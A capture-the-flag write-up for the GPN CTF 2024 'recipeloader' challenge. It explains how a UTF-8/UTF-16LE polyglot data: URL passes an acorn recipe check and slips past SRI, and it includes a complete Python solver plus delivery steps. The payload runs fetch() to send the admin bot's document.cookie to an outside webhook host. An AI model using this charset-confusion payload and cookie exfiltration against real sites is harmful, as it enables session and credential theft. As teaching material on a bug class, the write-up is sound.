recipeloader

gpn24

Task: a client page validates a fetched JS recipe = "..." assignment with acorn, then loads the same URL as a <script>, exempting data: URLs from SRI. Solution: build a UTF-8/UTF-16LE polyglot data: URL. The UTF-8 view passes acorn's string-literal check; the UTF-16LE view (honored by the <script> load through the URL's charset parameter) runs fetch() to exfiltrate the admin bot's flag cookie.

xss admin_bot cookie_exfiltration parser_differential sri_bypass data_url charset_confusion utf16_utf8_polyglot acorn html_script_charset

cookie_exfiltration sri_bypass_via_static_scheme fetch_vs_script_decoding_differential utf16le_utf8_polyglot ascii_nul_interleave acorn_parser_bypass

recipeloader — GPN CTF 2024 (gpn24)

Description

You can load a javascript recipe pls no(w) xss

English summary: A client page (http://localhost:1337/) takes a ?url= parameter, fetch()es it, validates the text as a strict recipe = "..." assignment using the acorn parser, then injects the same URL as a <script src=url>. Non-static URL schemes (http/https) are bound by Subresource Integrity (SRI), but "static" schemes (data:, blob:, ...) are exempted. An admin bot stores the flag in a normal, non-HttpOnly, same-origin cookie named flag on localhost:1337 and then visits an attacker-supplied URL. Goal: get XSS to exfiltrate that cookie.

Analysis

The vulnerable load pattern (index.html)

async function runScript(url) {
  const txt = await fetch(url).then(r => r.text());
  if (!isRecipeAssignmentProgram(txt)) throw new Error("invalid recipe assignment program");
  const s = document.createElement("script");
  s.src = url;
  if (!isScriptStatic(url)) s.integrity = `sha256-${await sha256(txt)}`;
  document.head.appendChild(s);
}

This is a classic check-then-load (TOCTOU) pattern: the validated bytes (txt from fetch) and the executed bytes (whatever <script src=url> resolves to) are two independent loads. The only thing keeping them identical is the SRI integrity attribute.
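To make the role of the integrity attribute concrete, here is a minimal Python sketch of how a pinned SRI value rejects a second load that returns different bytes. It is not the page's sha256() helper: the function name sri_sha256, the sample strings, and the choice to hash the UTF-8 encoding of the text are assumptions for illustration. Only the sha256-<base64 digest> value format is taken from the SRI convention.

```python
import base64
import hashlib

def sri_sha256(text: str) -> str:
    """Build an SRI value of the form sha256-<base64 digest> (UTF-8 encoding assumed)."""
    digest = hashlib.sha256(text.encode("utf-8")).digest()
    return "sha256-" + base64.b64encode(digest).decode("ascii")

validated = 'recipe = "pancakes"'   # what the first request returned (made-up sample)
swapped = "alert(1)"                # what a server could return on the second request

pinned = sri_sha256(validated)      # value placed in the integrity attribute
print(pinned)
print("second load accepted:", sri_sha256(swapped) == pinned)
```

With the digest pinned, a server that answers the two requests differently gains nothing, which is why the attack has to go through a scheme where no digest is set.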

isRecipeAssignmentProgram(src) runs acorn with sourceType:"script" and demands EXACTLY: body.length === 1, a single ExpressionStatement that is an AssignmentExpression with operator "=", left = Identifier named recipe, right = a string Literal or expression-free TemplateLiteral. In other words the text must be exactly recipe = "...".
isScriptStatic(url) parses the URL and looks at the protocol:
- staticProtos = [data, blob, javascript, mailto, resource, ssh, tel] → no integrity.
- nonstaticProtos = [file, ftp, http, https, urn, view-source, ws, wss] → integrity applied.
- Unknown protocol → throws.
sha256() uses Uint8Array.prototype.toBase64() to build the SRI digest.
After load, show() does recipeTarget.textContent = recipe — textContent, so no direct HTML injection is possible; we genuinely need script execution.
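The scheme classification described above can be reproduced outside the browser. The following is a rough Python port, not the challenge's JavaScript: the name is_script_static and the use of urllib.parse.urlsplit are assumptions, and Python's URL parser does not behave exactly like the browser's URL class. Only the two protocol lists come from the page.

```python
from urllib.parse import urlsplit

# Protocol lists as described for index.html.
STATIC_PROTOS = {"data", "blob", "javascript", "mailto", "resource", "ssh", "tel"}
NONSTATIC_PROTOS = {"file", "ftp", "http", "https", "urn", "view-source", "ws", "wss"}

def is_script_static(url: str) -> bool:
    """Return True when the page would skip the integrity attribute (hypothetical port)."""
    scheme = urlsplit(url).scheme  # lowercased by urlsplit; "" when no scheme is present
    if scheme in STATIC_PROTOS:
        return True
    if scheme in NONSTATIC_PROTOS:
        return False
    raise ValueError(f"unknown protocol: {scheme!r}")

if __name__ == "__main__":
    for u in ("data:text/javascript,recipe=1", "https://example.com/r.js"):
        print(u, "->", "no SRI" if is_script_static(u) else "SRI enforced")
```

Of the "static" schemes, data: is the interesting one here because the attacker fully controls both the bytes and the declared charset.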

The bot (admin.js)

GET /bot/run requires typeof url === 'string' && url.startsWith('http://localhost:1337').
Headless Chromium (Playwright) opens http://localhost:1337, runs document.cookie = "flag" + process.env.FLAG, then navigates to the attacker URL, waits 10 s, logs document.cookie, and closes. The assigned string contains no =, so document.cookie later reads back as flag immediately followed by the flag value.

So the flag is a normal same-origin cookie. Any JS executing on localhost:1337 can read it and exfiltrate it.

The key weakness — SRI exemption + decoding differential

For http:// and https:// URLs the SRI binding forces the validated text and the executed script to be byte-identical, so they cannot diverge. But data: is in staticProtos, so no integrity is enforced. We just need ONE byte sequence that:

- when decoded by fetch().text() → passes the strict recipe = "..." acorn check, and
- when executed by <script src=...> → is arbitrary JavaScript.

The differential that makes this possible:

- fetch('data:...').text() decodes the body as UTF-8 and IGNORES the ;charset= parameter. Verified empirically: fetch('data:text/plain;charset=UTF-16LE,AB') returns the two ASCII chars A and B, not one UTF-16 code unit.
- <script src="data:...;charset=UTF-16LE,..."> HONORS the charset and decodes the same bytes as UTF-16LE before executing. Verified: a UTF-16LE-encoded window.__ran='YES' ran when loaded as a charset=UTF-16LE script.

Same bytes, two decodings → a UTF-8/UTF-16LE polyglot.
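The two decodings can be mimicked with Python's codecs. This only models the decoders, not the browser itself; the variable names and the x=1 sample are illustrative.

```python
# The two bytes from the fetch() experiment above.
raw = b"AB"
utf8_view = raw.decode("utf-8")       # models what fetch().text() is described as returning
utf16_view = raw.decode("utf-16-le")  # models the charset=UTF-16LE script load
print(len(utf8_view), len(utf16_view))   # 2 1
print(hex(ord(utf16_view)))              # 0x4241

# ASCII interleaved with NUL bytes reads as plain ASCII in UTF-16LE,
# while the UTF-8 view keeps every NUL as its own character.
interleaved = b"x\x00=\x001\x00"
print(repr(interleaved.decode("utf-16-le")))  # 'x=1'
print(repr(interleaved.decode("utf-8")))      # 'x\x00=\x001\x00'
```

The second half is the property the polyglot relies on: the NULs are harmless filler inside a string in one view and vanish into clean ASCII in the other.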

Solution

Polyglot construction

We force a UTF-8 prefix recipe =" (note the space before =) and fill the string body with ASCII characters interleaved with 0x00 NUL bytes. Acorn happily accepts raw NULs inside a string literal, so the UTF-8 view is a valid recipe = "<ascii+NULs>" assignment. In UTF-16LE each <asciichar>\x00 pair decodes to a clean ASCII char, so the UTF-16LE view reads as ordinary ASCII JavaScript.

Engineering constraints (all required):

- Space before =. In UTF-16LE the bytes r e c i p e SP = " decode to a run of CJK code points (敲楣数㴠 ...) that are all valid identifier characters, forming one valid JS identifier. Without the space, the 4th UTF-16 unit becomes U+223D (∽, a math symbol), which is not an identifier char and breaks the UTF-16 program.
- Avoid " (0x22) and \ (0x5c) inside the UTF-8 string body. Those bytes would prematurely close or escape the UTF-8 string literal. Use single quotes in the payload.
- Parity / alignment. recipe =" is 9 bytes (odd). One filler byte 0x3d (=) is prepended to the payload so the first UTF-16 unit after the prefix (0x22 paired with 0x3d → U+3D22, a valid identifier-continue char) keeps the leading identifier syntactically valid; the rest then sits on even byte boundaries for clean ascii+NUL interleaving. With this layout the length before padding (9 + 1 + 2n + 1 bytes for an n-character payload) is always odd, so a trailing space byte is added before the closing " to make the total even. It pairs with the quote as U+2220 (∠) and falls inside the UTF-16 // comment.
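The code points and the parity argument in these constraints can be checked with a few lines of Python. This is a sketch under one loud assumption: str.isidentifier() follows Python's XID_Start/XID_Continue rules, which are close to but not the same as ECMAScript's identifier rules, so it is only a proxy. The helper name units and the sample payload host are made up.

```python
import unicodedata

def units(b: bytes) -> str:
    """Decode an even-length byte string as UTF-16LE."""
    return b.decode("utf-16-le")

with_space = units(b'recipe ="' + b"=")  # 9-byte prefix + 1 filler byte = 10 bytes
without_space = units(b'recipe="')       # 8 bytes, already even

for label, s in (("with space", with_space), ("without space", without_space)):
    cats = [f"U+{ord(c):04X}/{unicodedata.category(c)}" for c in s]
    # isidentifier() is a Python-side proxy for "valid JS identifier" (assumption).
    print(label, cats, "identifier-like:", s.isidentifier())

# Parity: prefix (9) + filler (1) + 2 bytes per payload char + closing quote (1).
n = len("=fetch('//host?'+document.cookie)//")  # placeholder payload
total = 9 + 1 + 2 * n + 1
print("odd before padding:", total % 2 == 1)

# The padding space pairs with the closing quote: bytes 0x20 0x22.
print(hex(ord(units(b' "'))))  # 0x2220
```

The "with space" row should show only letter-category (Lo) code points, while the "without space" row ends in a math symbol (Sm), matching the first constraint.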

Final UTF-16LE program that actually runs:

敲楣数㴠㴢=fetch('//<EXFIL_HOST>?'+document.cookie)//∠

In sloppy/script mode this assigns the fetch(...) result to an implicit global (allowed), and the trailing // comments out the leftover units (the closing-quote byte etc). The fetch leaks document.cookie to the attacker host.

Both views were validated programmatically: the UTF-8 view passes the exact acorn recipe = "..." predicate; the UTF-16LE view parses as a syntactically valid sloppy-mode script.
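A rough offline version of that double check might look like the sketch below. It is not the validation that was actually run: the regular expression is only a stand-in for the acorn predicate, the UTF-16LE side is checked by simple string splitting rather than a JavaScript parser, and the host attacker.example/x is a hypothetical placeholder.

```python
import re

HOST = "attacker.example/x"  # hypothetical exfil endpoint, for illustration only
payload = "=fetch('//" + HOST + "?'+document.cookie)//"

# Prefix, one filler '=', ASCII+NUL interleaved payload, padding space, closing quote.
blob = b'recipe ="' + b"=" + payload.encode("utf-16-le") + b' "'

utf8_view = blob.decode("utf-8")
utf16_view = blob.decode("utf-16-le")

# Stand-in for the acorn check: a single double-quoted string with no quote,
# backslash, or line break inside. This is NOT acorn and is stricter in places.
RECIPE_RE = re.compile(r'recipe\s*=\s*"[^"\\\r\n]*"\Z')
print("UTF-8 view looks like a recipe assignment:", bool(RECIPE_RE.match(utf8_view)))

# The UTF-16LE view should read <identifier>=fetch(...)//<leftover unit>.
ident, _, rest = utf16_view.partition("=")
print("leading identifier:", ident)
print("rest:", rest)
```

A real check would feed utf8_view to acorn and utf16_view to a JavaScript parser; the sketch only confirms the overall shape of each view.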

Reusable solver — gen_payload.py

#!/usr/bin/env python3
import sys, urllib.parse
EXFIL = sys.argv[1] if len(sys.argv) > 1 else "EXFILHOST/exfil"
TARGET = "http://localhost:1337/"

def utf16_ascii(s):
    out = bytearray()
    for ch in s:
        c = ord(ch); assert c < 128, ch
        out += bytes([c, 0])
    return bytes(out)

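pre = b'recipe ="'                       # space before = keeps the 4th UTF-16LE unit an identifier char (U+3D20, not U+223D)
payload = "=fetch('//" + EXFIL + "?'+document.cookie)//"   # no " or \ allowed
assert '"' not in payload and '\\' not in payload, "payload would break the UTF-8 string literal"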
content = bytes([0x3d]) + utf16_ascii(payload)
body = pre + content
full = body + b'"'
if len(full) % 2 != 0:
    full = body + b' "'
enc = ''.join('%%%02X' % b for b in full)
data_url = 'data:text/javascript;charset=UTF-16LE,' + enc
attack_url = TARGET + '?url=' + urllib.parse.quote(data_url, safe='')
bot_url = 'http://localhost:1337/bot/run?url=' + urllib.parse.quote(attack_url, safe='')
print("UTF-8  view:", full.decode('utf-8'))
print("UTF-16 view:", full.decode('utf-16le'))
print("DATA URL:\n" + data_url)
print("ATTACK URL:\n" + attack_url)
print("BOT URL:\n" + bot_url)

Delivery / exploitation steps

- Generate the data: URL with a readable exfil host (used webhook.site; created a token via POST https://webhook.site/token).
- Build the attack URL: http://localhost:1337/?url=<urlencoded data: URL>. It starts with http://localhost:1337, so it passes the bot's startsWith check.
- Submit to the bot: GET https://<instance>/bot/run?url=<urlencoded attack URL> → bot replies ok.
- The bot sets cookie flag+FLAG on localhost:1337, then visits the attack URL. The page fetch()es the data: URL (UTF-8 → valid recipe, passes validation, no SRI because data: is "static"), then loads the same data: URL as a <script>, which honors charset=UTF-16LE, executes the UTF-16 payload, and fetches //webhook/?<document.cookie>.
- Poll the webhook; received ...?flagGPNCTF{REDACTED} (cookie name flag + flag value).
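The two layers of URL encoding in these steps are easy to get wrong, so here is a small Python sketch that builds the nested URLs and peels them apart again. The data: URL body is a short placeholder rather than the real payload, instance.example is a hypothetical bot host, and the use of parse_qs to model how the bot and the page each read their ?url= parameter is an assumption.

```python
from urllib.parse import quote, urlsplit, parse_qs

TARGET = "http://localhost:1337/"
# Placeholder body, not the real polyglot.
data_url = "data:text/javascript;charset=UTF-16LE,%72%65"

# Layer 1: the page's ?url= parameter carries the data: URL.
attack_url = TARGET + "?url=" + quote(data_url, safe="")
# Layer 2: the bot's ?url= parameter carries the attack URL (hypothetical host).
bot_url = "https://instance.example/bot/run?url=" + quote(attack_url, safe="")

# The bot's check as described: a plain prefix test on the submitted URL.
assert attack_url.startswith("http://localhost:1337")

# Each hop strips exactly one layer of percent-encoding.
hop1 = parse_qs(urlsplit(bot_url).query)["url"][0]  # what the bot navigates to
hop2 = parse_qs(urlsplit(hop1).query)["url"][0]     # what the page fetches and loads
print(hop1 == attack_url, hop2 == data_url)
```

Encoding with safe="" matters here: the percent signs of the data: URL body must themselves be escaped at each layer, otherwise the payload bytes would be decoded one hop too early.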

The flag text itself confirms the bug class: "url parsing is hard even for browsers."